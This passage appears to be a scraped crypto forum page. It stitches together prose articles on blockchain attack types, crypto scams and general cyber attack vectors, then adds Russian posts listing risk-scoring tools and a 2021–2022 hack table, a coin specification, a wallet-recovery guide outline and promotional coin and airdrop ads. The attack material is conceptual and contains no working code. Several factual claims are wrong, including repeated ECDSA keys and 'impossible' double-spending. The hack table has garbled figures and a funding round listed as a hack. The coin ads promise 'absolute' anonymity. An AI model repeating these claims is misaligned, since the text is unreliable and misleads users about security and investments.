Chinese warehouse farms and away from the distributed hands of people around the world, it becomes easier for a central group to dominate all mining, and thus, the consensus. In other words, one entity with sufficient computing power to throw at the task can take over a network and essentially write reality to be whatever they want it to be. Called a 51% attack, when an attacker gains a majority control over the nodes in the network, they can control the new reality of the blockchain. While larger blockchains may or may not be at that point, several smaller networks have experienced these attacks already. The proof of concept has been proven, and now it’s a problem that must be solved. Another attack, known as an “eclipse attack”, involves taking over communications to and from a node. By isolating a node and controlling traffic to it, an attacker can trick that node into wasting time and resources with false data, and thus failing to achieve participation in the blockchain. The “timejacking” attack is similar. A hacker can theoretically alter the time handling of a node and tricks that node into operating on a temporary fork of the blockchain, often using multiple peers that are compromised to use their alternative fork for the attack. Other attacks involve misdirection. The “selfish miner” attack was first theorized. It involves strategic timing with mining and adding the mined block to the chain, such that it essentially forks the protocol and forces other miners to waste their time and lose out on the benefits of mining. A “partition attack” is a kind of attack where attackers segment the network, dividing it into several different partitions that cannot communicate between one another. Selectively blocking traffic essentially forks the blockchain, requiring consensus only within the partition. Similar attacks, called delay attacks, tamper with the speed that nodes can propagate their messages across the network. One of the most common sorts of attacks is called a double-spending attack. With blockchain-based currencies, the network needs to agree that the request matches its ledger to verify a transaction. Getting all nodes on the network to agree takes time, though, and that lapse in time can be exploited. There are several kinds of double-spending attacks, including Finney attacks, Race attacks, and Vector76. Denial of Service Attacks One of the common threats to online businesses and services is the distributed denial of service or DDoS attacks. A DDoS attack involves thousands to millions of machines operating to send data to a server, far more than it can process, bringing it down. This happens hundreds of times every year, to everything from small businesses to major websites. The distributed nature of the blockchain means it’s less susceptible to these attacks, but botnets can be very, very large, and can be tuned to attack multiple parts of a blockchain network at once. Additionally, numerous instances in the past have shown that even if the blockchain itself isn’t vulnerable, the hubs that use it are; coin exchanges are a popular target for DDoS attacks. Additionally, many of the more common attacks, such as attacking passwords with dictionary brute-forcing, or phishing and social engineering users for their private information, can work to secure accounts on exchanges and other blockchain-adjacent technologies and platforms. The very nature of the cryptographic protocol used in the blockchain can leave it vulnerable. Bitcoin is a prime example, using the ECDSA algorithm to generate private keys. Due to the size of the blockchain ledger, it appears that the algorithm used doesn’t have sufficient entropy and can generate the same key more than once. The hashing function used at the core of a blockchain needs to be appropriately complex and entropic to ensure security, and it can be difficult to foresee issues of scale. On top of all of that, physical attacks can still work as well. One method for storing cryptocurrency “safely” is the Cold Wallet, a wallet storing the data completely segregated from the internet, out of the reach of digital hackers. Someone with the right access to the right facility, though, can simply steal a hard drive and all of the wallets it contains. Novel Solutions to Novel Problems Blockchain technology is new and interesting, and as such, thousands of tech startups and hundreds of established companies are working in the space. It’s ripe for innovation and experimentation, but that always opens up room for new attacks. All it takes is forgetting a key element of security along the way to leave a vulnerability open in new technology. One of the most interesting uses of blockchain technology involves divorcing it from the cryptocurrency aspect of the tech and using the core blockchain protocol in other ways. This has fascinating potential and requires a lot of critical thinking and testing to spot potential security issues in the implementation of new technology. Many of the problems we have listed up above have solutions, either in theoretical space or in actual implementation. Consider the problems presented and think about potential solutions. What might you come up with? If the thought exercise interests you, and blockchain technology is something you find fascinating, you might consider pursuing a program to learn the ins and outs of the technology and its security challenges. Our program can certify you as a blockchain developer and prepare you to work in the fast-paced world of emerging technologies. Whether you’re interested in developing blockchain technology for the next step in its evolution, or you’re more interested in the cat-and-mouse game of hacker versus cybersecurity expert, there’s room for you in the blockchain space. Learn the ins and outs of the technology today, and get started with your contribution to the technology tomorrow. The most famous cryptocurrency is Bitcoin, but there are many others, such as Ethereum, Litecoin, and Monero. Cryptocurrencies are often bought and sold on decentralized exchanges and can also be used to purchase goods and services. How Do Cryptocurrencies Work? Cryptocurrencies use blockchain technology to create a secure, decentralized ledger of all transactions. Blockchain is a secure distributed database from hacking because it uses cryptography to encrypt transactions and prevent double-spending. Whenever a transaction is made, it is recorded on the blockchain and verified by a network of computers. This makes it impossible to spend the same cryptocurrency twice fraudulently. It also makes cryptocurrencies much more secure than traditional fiat currencies, which are vulnerable to counterfeiters. What Are the Cryptocurrency Scams That Affect Cybersecurity? Since cryptocurrencies are digital and often stored in online wallets, they are vulnerable to hacking. In fact, there have been several high-profile hacks of cryptocurrency exchanges in recent years, resulting in the loss of millions of dollars worth of cryptocurrency. In early May 2021, a ransomware attack struck the Colonial Pipeline. This attack resulted in the shutdown of the pipeline, which provides much of the fuel for the East Coast of the United States. The hackers demanded a ransom of $5 million in Bitcoin, and they got it. This is just one example of how criminals use cryptocurrency to extort money from victims. Below, we’ve listed the major cryptocurrency scams affecting the cybersecurity of businesses and the security of companies and individuals. Investment Scams: These scams lure victims with the promise of high returns on their investment in a new cryptocurrency. The reality is that these scammers will take your money and disappear. Phishing Scams: Phishing is a type of cyber-attack that involves criminals sending fake emails or messages that look like they come from a legitimate source, such as a cryptocurrency exchange. These messages will often contain links that lead to counterfeit websites that steal your login credentials or infect your computer with malware. Ponzi Schemes: A Ponzi scheme is a type of investment scam that promises high returns but instead uses the money from new investors to pay old investors. These schemes eventually collapse, leaving the new investors with nothing. Initial Coin Offering (ICO) Fraud: An ICO is a crowdfunding campaign used to raise funds for new cryptocurrencies. However, many ICOs are scams, and the people behind them will take your money and disappear. Malware: Cryptocurrency mining requires a lot of computing power, which criminals can harness to mine cryptocurrency for themselves. They do this by infecting your computer with malware that allows them to use your resources to mine cryptocurrency. This can slow down your computer and use up a lot of your electricity. How Does Cryptocurrency Affect the Security of Your Business? Cryptocurrencies are often used in ransomware attacks, as we saw with the Colonial Pipeline attack. In these attacks, hackers will encrypt your data and demand a ransom in cryptocurrency to decrypt it. These attacks can be very costly for businesses, as they have to pay the ransom and deal with the downtime caused by the attack. In some cases, companies may not be able to recover their data even after paying the ransom. Cryptocurrency can also buy and sell illegal goods and services on the dark web. This includes things like drugs, weapons, and child pornography. By using cryptocurrency, criminals can buy and sell these items anonymously without fear of being caught. This makes it very difficult for law enforcement to track down these criminals. Cryptocurrency can also be used in money laundering schemes. In these schemes, criminals will convert their illicit funds into cryptocurrency and then use it to buy legitimate goods and services, making it difficult to trace the money and track down the criminals. Overall, cryptocurrency can have a significant impact on the security of your business. If you accept cryptocurrency as payment, you could be targeted by criminals. Additionally, if you use cryptocurrency to buy or sell goods and services, you could unwittingly participate in criminal activity. For these reasons, it’s essential to exercise caution when dealing with cryptocurrency. Make sure you only deal with reputable exchanges and businesses, and be sure to keep your computer security up-to-date to protect yourself from mining malware and other attacks. What are the measures businesses can take to protect themselves from cryptocurrency scams? Businesses can take a few measures to protect themselves from cryptocurrency scams. Educate yourself and your employees about cryptocurrency and how it works. It will help you spot red flags that indicate a scam. Only deal with reputable exchanges and businesses. Do your research to make sure you’re dealing with a legitimate company. Keep your computer security up-to-date to protect yourself from mining malware and other attacks. Be careful when accepting cryptocurrency as payment. Make sure you understand the risks involved before you agree to receive it. If you use cryptocurrency to buy or sell goods and services, only deal with reputable companies. Be aware of the risks involved in doing this. You can help protect your business from cryptocurrency scams by taking these measures. What is the future of cryptocurrency? The future of cryptocurrency is uncertain, and it remains to be seen whether it will become widely adopted or fade into obscurity. Cryptocurrency has the potential to revolutionize the way we conduct business and interact with each other. However, it also has the potential to be used for criminal activity. Only time will tell what the future of cryptocurrency holds. In the meantime, it’s essential to exercise caution when dealing with it. Cybercriminals can make money from attacking your organization’s software systems, such as stealing credit card numbers or online banking credentials. However, there are other more sophisticated ways to monetize their actions that aren’t as obvious as stealing money. Attackers may infect your system with malware that grants remote access to a command and control server. Once they have infected hundreds or even thousands of computers they can establish a botnet, which can be used to send phishing emails, launch other cyber attacks, steal sensitive data, or mine cryptocurrency. Another common motivation is to gain access to personally identifiable information (PII), healthcare information, and biometrics to commit insurance fraud, credit card fraud or illegally obtain prescription drugs. Competitors may employ attackers to perform corporate espionage or overload your data centers with a Distributed Denial of Service (DDoS) attack to cause downtime, harm sales, and cause customers to leave your business. Money is not the only motivator. Attackers may want to leak information to the public, embarrass certain organizations, grow political ideologies, or perform cyber warfare on behalf of their government like the United States or China. How Do Attackers Exploit Attack Vectors? There are many ways to expose, alter, disable, destroy, steal or gain unauthorized access to computer systems, infrastructure, networks, operating systems, and IoT devices. In general, attack vectors can be split into passive or active attacks: Passive Attack Vector Exploits Passive attack vector exploits are attempts to gain access or make use of information from the system without affecting system resources, such as typosquatting, phishing, and other social engineering-based attacks. Active Attack Vector Exploits Active cyber attack vector exploits are attempts to alter a system or affect its operation such as malware, exploiting unpatched vulnerabilities, email spoofing, man-in-the-middle attacks, domain hijacking, and ransomware. That said, most attack vectors share similarities: The attacker identifies a potential target The attacker gathers information about the target using social engineering, malware, phishing, OPSEC, and automated vulnerability scanning Attackers use the information to identify possible attack vectors and create or use tools to exploit them Attackers gain unauthorized access to the system and steal sensitive data or install malicious code Attackers monitor the computer or network, steal information, or use computing resources. One often overlooked attack vector is your third and fourth-party vendors and service providers. It doesn’t matter how sophisticated your internal network security and information security policies are — if vendors have access to sensitive data, they are a huge risk to your organization. This is why it is important to measure and mitigate third-party risks and fourth-party risks. This means it needs to be part of your information security policy and information risk management program. Consider investing in threat intelligence tools that help automate vendor risk management and automatically monitor your vendor’s security posture and notify you if it worsens. Every organization now needs a third-party risk management framework, vendor management policy, and vendor risk management program. Before considering a new vendor perform a cybersecurity risk assessment to understand what attack vectors you could be introducing to your organization by using them and ask about their SOC 2 compliance. What are the Common Types of Attack Vectors? Compromised Credentials ‍Usernames and passwords are still the most common type of access credential and continue to be exposed in data leaks, phishing scams, and malware. When lost, stolen, or exposed, credentials give attackers unfettered access. This is why organizations are now investing in tools to continuously monitor for data exposures and leaked credentials. Password managers, two-factor authentication (2FA), multi-factor authentication (MFA), and biometrics can reduce the risk of leak credentials resulting in a security incident too. Weak Credentials ‍Weak passwords and reused passwords mean one data breach can result in many more. Teach your organization how to create a secure password, invest in a password manager or a single sign-on tool, and educate staff on their benefits. Insider Threats ‍Disgruntled employees or malicious insiders can expose private information or provide information about company-specific vulnerabilities. Missing or Poor Encryption ‍Common data encryption methods like SSL certificates and DNSSEC can prevent man-in-the-middle attacks and protect the confidentiality of data being transmitted. Missing or poor encryption for data at rest can mean that sensitive data or credentials are exposed in the event of a data breach or data leak. Misconfiguration ‍Misconfiguration of cloud services, like Google Cloud Platform, Microsoft Azure, or AWS, or using default credentials can lead to data breaches and data leaks, check your S3 permissions or someone else will. Automate configuration management where possible to prevent configuration drift. Ransomware ‍Ransomware is a form of extortion where data is deleted or encrypted unless a ransom is paid, such as WannaCry. Minimize the impact of ransomware attacks by maintaining a defense plan, including keeping your systems patched and backing up important data. Phishing ‍Phishing attacks are social engineering attacks where the target is contacted by email, telephone, or text message by someone who is posing to be a legitimate colleague or institution to trick them into providing sensitive data, credentials, or personally identifiable information (PII). Fake messages can send users to malicious websites with viruses or malware payloads. Learn the different types of phishing attacks here. Vulnerabilities ‍New security vulnerabilities are added to the CVE every day and zero-day vulnerabilities are found just as often. If a developer has not released a patch for a zero-day vulnerability before an attack can exploit it, it can be hard to prevent zero-day attacks. Brute Force ‍Brute force attacks are based on trial and error. Attackers may continuously try to gain access to your organization until one attack works. This could be by attacking weak passwords or encryption, phishing emails, or sending infected email attachments containing a type of malware. Read our full post on brute force attacks. Distributed Denial of Service (DDoS) DDoS attacks are cyber attacks against networked resources like data centers, servers, websites, or web applications and can limit the availability of a computer system. The attacker floods the network resource with messages which cause it to slow down or even crash, making it inaccessible to users. Potential mitigations include CDNs and proxies. SQL Injections ‍SQL stands for a structured query language, a programming language used to communicate with databases. Many of the servers that store sensitive data use SQL to manage the data in their database. An SQL injection uses malicious SQL to get the server to expose information it otherwise wouldn’t. This is a huge cyber risk if the database stores customer information, credit card numbers, credentials, or other personally identifiable information (PII). Trojans ‍Trojan horses are malware that misleads users by pretending to be a legitimate program and are often spread via infected email attachments or fake malicious software. Cross-Site Scripting (XSS) XSS attacks involve injecting malicious code into a website but the website itself is not being attacked, rather it aims to impact the website’s visitors. A common way attackers can deploy cross-site scripting attacks is by injecting malicious code into a comment e.g. embedding a link to malicious JavaScript in a blog post’s comment section. Session Hijacking ‍When you log into a service, it generally provides your computer with a session key or cookie so you don’t need to log in again. This cookie can be hijacked by an attacker who uses it to gain access to sensitive information. Man-in-the-Middle Attacks ‍Public Wi-Fi networks can be exploited to perform man-in-the-middle attacks and intercept traffic that was supposed to go elsewhere, such as when you log into a secure system. Third and Fourth-Party Vendors ‍The rise in outsourcing means that your vendors pose a huge cybersecurity risk to your customer’s data and your proprietary data. Some of the biggest data breaches were caused by third parties. Conclusion Cryptocurrency can have a significant impact on the security of your business. If you accept cryptocurrency as payment, you could be targeted by criminals. Additionally, if you use cryptocurrency to buy or sell goods and services, you could unwittingly participate in criminal activity. Businesses can take a few measures to protect themselves from cryptocurrency scams. These include educating yourself and your employees about cryptocurrency, only dealing with reputable firms and exchanges, and keeping your computer security up-to-date. Though blockchain popularity is still on the rise, an increasing number of cyber attacks on blockchains may negatively affect their reputation. Knowing the most common blockchain vulnerabilities and attack types is a must for everyone who’s concerned about blockchain security and wants to know what to secure first. GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/7pqVNbcGzls Source: https://cryptodeeptech.ru/blockchain-attack-vectors Cryptanalysis
  20. CRYPTO DEEP TECH В этой статье мы составили список полезных инструментов и сервисов по отслеживание незаконных действии, криптоугроз и поиска уязвимости в транзакции блокчейна. Большинство сервисов включают в себя комплексную платформу для мониторинга взлома и алгоритма процесса для безопасности криптокошельков. В криптоанализе нам всегда важен контроль и анализ транзакций. Эти сервисы полезны, во-первых, для выявление финансовых преступлений связанные с криптокошельками, во-вторых, для борьбы с отмыванием денег и в третьих для криптоугроз фишинга, а также устранение багов, ошибок и уязвимостей. Оценка крипто-риска для физических лиц: Januus Бесплатный инструмент для оценки рисков криптокошелька, он помогает определить, совершал ли криптокошелек транзакцию с злоумышленником, принадлежит ли он мошеннику и в целом безопасен ли адрес кошелька. Он создает отчет о мошеннической деятельности любого Эфириума или Биткоин Адреса на основе соответствующих идентификационных данных и анализа транзакций и отображает контрольный журнал для этого отчета в чистом JSON. (бесплатная оценка рисков через общедоступный репозитории в GitHub ) Запуск в Google Colab работает на любом веб-браузере GreySafe GreySafe — это управляемая сообществом служба отчетности о субъектах криптоугроз, которая принимает заявки из всех цепочек и фокусируется на их проверке и точной атрибуции. Etherscan Etherscan — это платформа для исследования блоков и аналитики Ethereum, которая помечает плохие кошельки. Chainalysis Chainalysis — это блокчейн-платформа данных с бесплатным API для санкций. PeckShieldAlert PeckShield компания, занимающаяся безопасностью блокчейна и аналитикой данных, с плагином Sunrise: NFT Scam Protector Sunrise.wtf Плагин для многоуровневой защиты от мошенничества NFT Scam Sniffer Расширение браузера ScamSniffer предупредит вас, как только будет обнаружен фишинговый сайт, представляющий угрозу. ClankApp ClankApp исследуйте блокчейн (ETH, BTC, DOGE) или попробуйте бесплатный API Crypto Wales Solana Analytics Solana Analytics Обновления статистики Solana Network в режиме реального времени, включая общее количество транзакций, производительность TPS, общую комиссию, количество созданных блоков, количество валидаторов и учетных записей для голосования, а также бесплатные API. www.public-api.solscan.io/docs Оценка риска транзакций с криптовалютой в масштабе Бизнеса: ScoreChain ScoreChain отслеживает криптоактивы и помогает нам создать структурированную и последовательную стратегию AML для выявления, оценки и управления рисками. TruNarrative TruNarrative Регистрация клиентов в нескольких юрисдикциях, выявление финансовых преступлений, соответствие рискам и нормативным требованиям Elliptic Elliptic аналитика блокчейна и решения для обеспечения соответствия криптографии SEON SEON дает нам представление о каждом взаимодействии, заказе, учетной записи, транзакции и возможности Civic Pass Инструменты Civic Identity для web3, проверки личности и возраста / Инструменты соответствия облегчают поставщикам ликвидности, разработчикам dApp и институциональным участникам управление рисками и укрепление доверия Global Ledger Global Ledger Судебно-криминалистическая фирма по борьбе с отмыванием денег, позволяющая банкам, финтех- и крипто-ориентированным компаниям добиваться соответствия криптографии и снижать бизнес-риски, связанные с отмыванием денег. Acuant Acuant поможет нам мгновенно снизить риски, предотвратить мошенничество и повысить безопасность Elucidate Elucidate Фирма по управлению рисками финансовых преступлений, платформа с поддержкой блокчейна предоставляет индивидуальное решение по управлению рисками. Validus Validus Комплексная платформа, объединяющая наблюдение, мониторинг рыночных рисков, мониторинг алгоритмов и мониторинг AML/транзакций. Kinectify Kinectify — это программное обеспечение для борьбы с отмыванием денег и соблюдения требований, которое включает оптимизированные инструменты, позволяющие нам узнать каждого клиента. Merkle Science BitRank BitRank автоматизирует оценку крипто-риска, чтобы помечать транзакции с высоким риском Comply Advantage Comply Advantage Преимущество соблюдения требований Простая категоризация классов рисков Генерация данных о противодействии отмыванию денег, новое изобретение MistTracker MistTrack — это система отслеживания по борьбе с отмыванием денег, разработанная командой SlowMist, использующая аналитику в сети для помощи в отслеживании незаконных средств. Список взломов криптовалют с января 2021 года При таких темпах 2022 год, вероятно, превзойдет 2021 год как самый крупный год для взломов за всю историю наблюдений. На данный момент хакеры заработали более 3 миллиардов долларов за 125 взломов», — Chainalysis, 12 октября 2022 г., через Twitter Аналитическая компания Chainalysis назвала октябрь 2022 года «самым большим месяцем в году с самой большой хакерской активностью», когда общая стоимость взлома за месяц почти достигла 718 миллионов долларов. Несмотря на то, что прошло не больше половины месяца, Chainalysis сообщила, что 11 различных взломов протоколов децентрализованных финансов (DeFi) были использованы сотнями миллионов человек. Самой большой целью хакеров являются кроссчейн-мосты: в этом месяце на три моста было нанесено 82% убытков в октябре. По данным Chainalysis, самым крупным из этих взломов моста был эксплойт примерно на 100 миллионов долларов в мосту между криптобиржей Binance BNB Smart Chain и Beacon Chain. Feb 2021 $45k Cryptopia Troubled NZ Crypto Exchange Cryptopia Suffers Another Hack in the Midst of Liquidation Process Feb 2021 $37m Alpha Homora Alpha Homora loses $37 million following Iron Bank exploit Feb 2021 $14m Furucombo Transaction batching protocol Furucombo suffers $14 million ‘evil contract’ hack Feb 2021 $11m Yearn Finance Hacker Spends $8.3 Million in Fees to Attack Yearn Finance Mar 2021 $3m PAID Network PAID Network exploiter nets $3 million in infinite mint attack Mar 2021 $31m Meerkat Finance Dev says $31 million Meerkat Finance exploit was a ‘test’; will return funds Apr 2021 n/a Hotbit Cryptocurrency Exchange Hotbit Hacked: Systems Paralyzed, 2 Million Users Affected Apr 2021 $50m Uranium Finance Binance Chain DeFi Exchange Uranium Finance Loses $50M in Exploit Apr 2021 $80 EasyFi EasyFi Hacked for Over $80 Million in MetaMask Attack May 2021 $25m xToken xToken DeFi Project Hacked For Over $25M May 2021 $30m Spartan Protocol Binance Smart Chain’s Spartan Protocol Loses $30M+ in Exploit May 2021 $200 PancakeBunny PancakeBunny tanks 96% following $200M flash loan exploit May 2021 $11m bEarn DeFi Protocol bEarn Suffers $11M Flash Loan Attack May 2021 $22m Value DeFi $22 Million Was Stolen From Three Defi Platforms Last Weekend Jun 2021 $27m Stablemagnet THE STABLEMAGNET RUGPULL (JUNE 2021) Jun 2021 $20m Wintermute Wintermute Makes “Optimistic”” Assumption Aug 2021 $80m Liquid Liquid exchange hacked to the tune of $80 million Aug 2021 $25m Popsicle Finance DeFi Protocol Popsicle Finance Hacked for $25 Million Sept 2021 $35m Vee Finance Vee Finance Hit for $35M in Second Major Exploit on Avalanche Oct 2021 $130m Cream Finance Hackers steal $130 million from Cream Finance; the company’s 3rd hack this year Oct 2021 $68 Compound Bug bites DeFi protocol Compound again Oct 2021 $16m Indexed Finance Indexed Finance Attacker Refuses to Return Stolen $16M, Team Approaching Authorities Nov 2021 $55m bZx DeFi Lender bZx Suffers Hack for Reported $55M Nov 2021 n/a Snowdog OlympusDAO Fork Snowdog Hit By 90% Crash Dec 2021 $150m Bitmart Crypto exchange BitMart confirms hack resulting in loss of $150 million in crypto Dec 2021 $78m AscendEx Crypto exchange AscendEX hacked for $78 million in latest swindle Dec 2021 $120m Badger DAO Badger DAO Protocol Suffers $120M Exploit Dec 2021 $30m Grim Finance $30 million stolen from Grim Finance, audit firm blames new hire for vulnerability/ Dec 2021 $31m MonoX Protocol Detailed analysis of the $31 Million MonoX Protocol Hack Jan 2022 $6.8m LCX LCX loses $6.8M in a hot wallet compromise over Ethereum blockchain Jan 2022 $35m Crypto.com Crypto.com Says More Than $35 Million Stolen by Hackers Jan 2022 $80m Qubit QBridge Qubit pleads with hacker to return $80 million of stolen funds Feb 2022 $326m Wormhole Blockchain Bridge Wormhole Suffers Possible Exploit Worth Over $326M Feb 2022 $36m IRA Financial Trust Hackers Snagged $36 Million in Crypto in Breach of IRA Financial Feb 2022 $13m Superfluid Polygon stablecoin Qi Dao exploited for $13M on Superfluid vested contract Feb 2022 $10m Project Dego Finance DeFi Project Dego Finance Hacked: Exploiters Reportedly Drain Over $10M Mar 2022 $52m Cashio A Robin Hood-esque attacker steals $52 million from Cashio, then returns smaller amounts and pledges to donate the rest to charity Mar 2022 $625m Axie Infinity Axie Infinity’s Ronin Network Suffers $625M Exploit Mar 2022 $11m Agave Defi Protocols Agave and Hundred Finance Suffer Hack of $11M Apr 2022 $182m Beanstalk Attacker Drains $182M From Beanstalk Stablecoin Protocol Apr 2022 $80m Fei Protocol Fei Protocol and Rari Capital Pools Hit By $80 Million Hack Apr 2022 $11m Elephant Money Hackers steal more than $11 million from Elephant Money DeFi platform Apr 2022 $16m Deus Dao Deus DAO suffers another flash loan exploit, loses over $16M May 2022 $10m Saddle Finance Saddle Finance Loses Over $10 Million in Hack — Derev Blog Jun 2022 $100m Harmony Bridge Harmony’s Horizon Bridge hacked for $100M Jun 2022 $1.2m Inverse Finance DeFi Protocol Inverse Finance Exploited for $1.2M Jul 2022 $9m Crema Finance $8.78M stolen in hack of DeFi protocol startup Crema Finance Aug 2022 $200m Nomad Bridge Nomad crypto bridge loses $200 million in ‘chaotic’ hack Aug 2022 $611 Poly Network Largest DeFi Hack: $611 Million Stolen from Poly Network Sept 2022 $8m Vulcan Forged Play-to-Earn Gaming Platform Vulcan Forged Raises $8M in Series A Funding Sept 2022 $160m Wintermute Crypto Market Maker Wintermute Hacked for $160M, OTC Services Unaffected Oct 2022 $100m Binance Binance Smart Chain Halts After $100M Crypto Theft! Oct 2022 $90m Mirror Protocol DeFi Hack Worth $90M Unveiled Seven Months Following The Theft Oct 2022 $21m Transit Swap Transit Swap loses over $21M due to code bug exploit, issues apology GitHub Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/-s8Z6df_kxY Источник: https://cryptodeep.ru/crypto-risk-scoring Криптоанализ
  21. Website | Telegram Ru | Block explorer | Github Skynet Research coin или Skyrcoin - это децентрализованная криптовалюта с открытым исходным кодом. Это форк PIVX/PEONY. Поэтому Skyrcoin гарантирует мгновенные транзакции по всему миру/POS 3.0/Мастерноды. Цель проекта - создание надежного инструмента инвестирования для всех категорий пользователей. Курс будет привязан к стоимости проверенных временем криптоактивам, таких как биткоин, эфириум, к стоимости акций перспективных компаний и металлов. Защита окружающей среды, снижение уровня выхлопных газов, техногенного шума, разработка ресурсосберегающих технологий и новых источников энергии - приоритетные направления развития науки и техники. Спецификация Название : Skynet Research Тикер: SKYR Всего: 10 000 000 000 coins Премайн: 280,000,000 coins Swap: ~22,500,000 coins Тип криптовалюты: PoS/Мастерноды Алгоритм: X11KVS (peony coin), ~Quark+ Время блока: 60 секунд Награда за 1 блок (до 100001 блока): 5 монет Награда Мастерноды: 80% Награда POS: 20% Запуск основной сети: 25 июня 2021 Эксплорер: 45.9.73.207:3001/ или skynresearch.ru Домен: skynresearch.ru Сайт: в разработке, вся информация есть в канале и группе проекта в Telegram. Количество подтверждений для входящих/исходящих транзакций (основная сеть): 7 Количество подтверждений для PoS/MN: 101 Минимальный возраст для стекинга: 1 час (после 5000 блока - 600 подтверждений / 10 часов). Распределение наград (20% + 80%) за блок с 251 по 100001 5 (1 + 4) с 100001 по 200000 12 с 200001 по 300000 25 с 300001 по 400000 40 с 400001 по 500000 60 с 500001 по 600000 50 с 600001 по 700000 35 с 700001 по 1000000 25 после 1000001 0 Залог Мастерноды, до блока, монет: до 100,000 200000 монет с 100001 по 200000 300000 монет с 200001 по 300000 500000 монет с 300001 по 400000 700000 монет с 400001 1000000 монет Дополнительная информация: https://t.me/diplex_swap/44 https://t.me/c/1463447261/137 Whitepaper: Основные технологии описаны в PIVX Whitepaper. Отличаются финансовые и экономические расчеты, таблица распределения наград и таблица роста залога для мастернод. https://pivx.org/files/whitepapers/PIVX_Non_Technical_Whitepaper_v2.0.pdf Снимок блокчейна Diplex classic (2018г) выполнен 16 июля 2021 года на блоке 645383. Монеты отправлены на адреса, стекавшие с 2021-06-17 по 2021-07-16 09:09:16. Держатели, имеющие диплекскоины на блокчейн-кошельках, могут подать заявку в группе Телеграмм. Раздачи: Раздача 1000 skyr для первых 10 участников, завершена; Раздача 1000 skyr для следующих 10 участников, активна; Раздача 100 skyr для следующих 100 участников, активна; Раздача 100 skyr для следующих 200 участников, планируется. Вы можете сообщить свой адрес в этой теме или группе в Телеграм. Telegram группа (Skynet Research coin): https://t.me/Skynet_Research_coin Telegram канал (Diplex swap (X13) to Skynet Research): https://t.me/diplex_swap) Исходный код: https://github.com/DiplexSoftfork/Skyrcoin Github: https://github.com/DiplexSoftfork/Skyrcoin Qt-кошелек, Linux x64, Windows x64 only: https://github.com/DiplexSoftfork/Skyrcoin/releases 31 января 2022 состоялся swap и перезапуск проекта. Спецификация v 2.0.0.8/2022 Наименование Skynet Research Тикер SKYR Алгоритм Quark Максимальное количество монет 10 млрд. Премайн 15 млн. (количество, оставшееся после свопа, будет заблокировано) Тип майнинга PoS+Masternode Вознаграждение за блок, до 5001 5 монет - после 5000 1+4 Сумма залога для Masternode 400000 (c 1 по 800001 блок) Вознаграждение Мастернод 80% Вознаграждение PoS (кошелек) 20% Отчисления разработчикам 0% Время блока 60 сек Кол-во подтверждений для вызревания входа 101 Включение пос: - в основной сети на блоке 251 - в тестовой сети на блоке 201 - в регтесте на блоке 251 Кол-во подтверждений для входящих/исходящих транзакций: - в основной сети 7 - в тестовой сети 3 - в регтесте 3 Кол-во подтверждений для pow/pos транзакций: - в основной сети 101 - в тестовой сети 16 - в регтесте 101 Распределение наград (20%+80%) на блоке до 100001 5 (1+4) с 100001 по 200000 4 с 200001 по 300000 3 с 300001 по 400000 2 с 400001 по 500000 2 с 500001 по 600000 1 с 600001 по 700000 0.5 с 700001 по 800000 0.5 с 800001 0.5 Сумма залога для мастернод, с блока с 1 по 800000 400000 skyr
  22. CRYPTO DEEP TECH Инструменты для восстановления пароля и seed-фразы кошелька с открытым исходным кодом в репозитории Crypto Deep Tools . У многих в криптосообществе бывает ситуация, когда вы случайно потеряли или забыли часть своей мнемоники или допустили ошибку при отправке монет BTC. (Таким образом, вы либо видите пустой кошелек, либо получаете сообщение об ошибке, что ваше seed-фразa кошелька недействительно). BTCRecover — это инструмент для восстановления пароля и сид-фразы кошелька с открытым исходным кодом. Перейдем к экспериментальной части: Откроем [TerminalGoogleColab] . Воспользуемся репозиторием «17BTCRecoverCryptoGuide» . Команды по установке: Устанавливаем все необходимые пакеты, модули и библиотеки Использование команды lscpu, чтобы узнать архитектуру процессора Google Colab Установка PyOpenCL для Linux Тестирование вашей системы Базовое восстановление Биткоина GitHub Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/imTXE4rGqHw Источник: https://cryptodeep.ru/btc-recover-crypto-guide Cryptanalysis
  23. Получаем монеты за выполнения заданий в телеграмме! Ссылка - ТЫК Аирдроп закончиться 30 Марта Токены придут на кошельки 31 Марта Приблизительная цена на листинге в PanCakeSwap 1SULY = 1,3$.
  24. Команда WAY-F coin имеет многолетний опыт в разработке и реализации проектов, а таже различных решений в сфере криптовалют и блокчейн технологий. За основу монеты взяли блокчейн Биткоина и улучшили его по скромным подсчетам в 10 раз, опираясь на острые проблемы имеющиеся в крипто индустрии на сегодняшний день. WAY-F coin имеет открытый исходный код(https://github.com/wayfcoin/source), поэтому каждый желающий может взять его и сделать собственную криптовалюту на базе блокчейна WAY-F. Благодаря передовым решениям и наработкам в блокчейн сфере и их успешному применению в WAY-F coin, монета является эталоном по технической реализации для множества криптовалют, а также в несколько раз превосходят Dash и Monero. Биржи на которых торгуется WAYF coin На сегодняшний день Вы можете купить или продать монету WAYF на четырёх крупных биржах: Coinsbit— Крупнейшая Европейская биржа запущенная в Эстонии в 2018 году. Биржа регулярно занимает ведущие позиции в ТОП-50 с объёмом торгов $2 256 133 060 за 24 часа. BigONE — Крупнейшая Китайская биржа появившихся на волне успеха криптовалют в 2017 году. Ежедневный объём торгов ($394 337 459) уже превышает всем известную Poloniex ($221 650 532), которая сегодня находится на 11 месте среди всех бирж. Biconoby — Молодая и очень перспективная биржа, которая отрывает перед сообществом выход на Канадский рынок. Ежедневный объём торгов биржи составляет $757 543 954. PrizmBit — СНГ биржа запущенная в недалёком 2019 году. На сегодня площадка входит в ТОП-150 бирж по версии CoinMarketCap. В 2020 году WAYF coin был добавлен на авторитетный мониторинг криптовалют CoinMarketCap. В этом (2021) году будет реализована возможность создания смарт контрактов на блокчейне WAYF. Абсолютная защита данных и конфиденциальности Одним из главных преимуществ монеты является — полная анонимность путём абсолютной защиты данных и конфиденциальности, которая обеспечивается благодаря множеству инновационных технологических решений. Благодаря технологии GCPT обеспечивается абсолютно новый уровень анонимности. Любая информация внутри системы остается полностью скрытой от посторонних глаз без возможности каким-либо существующем в мире методом её обойти. ES Technology обеспечивает неприступную защиту для всей блокчейн сети. Не допускает дестабилизацию сети при использовании даже самых высоких мощностей по алгоритму Proof-of-Work. Данная технология гарантирует, что все участники сети нaxoдятcя в равных условиях и беспрекословно соблюдают общие для всего сообщества правила. AlphaDeepSend – это уникальный сервис отправки сообщений до 1.000.000 символов с многоступенчатым крипто шифрованием данных. Уровень шифровки данных отправителя и получателя в десятки раз превосходят все существующие ресурсы — Telegram, 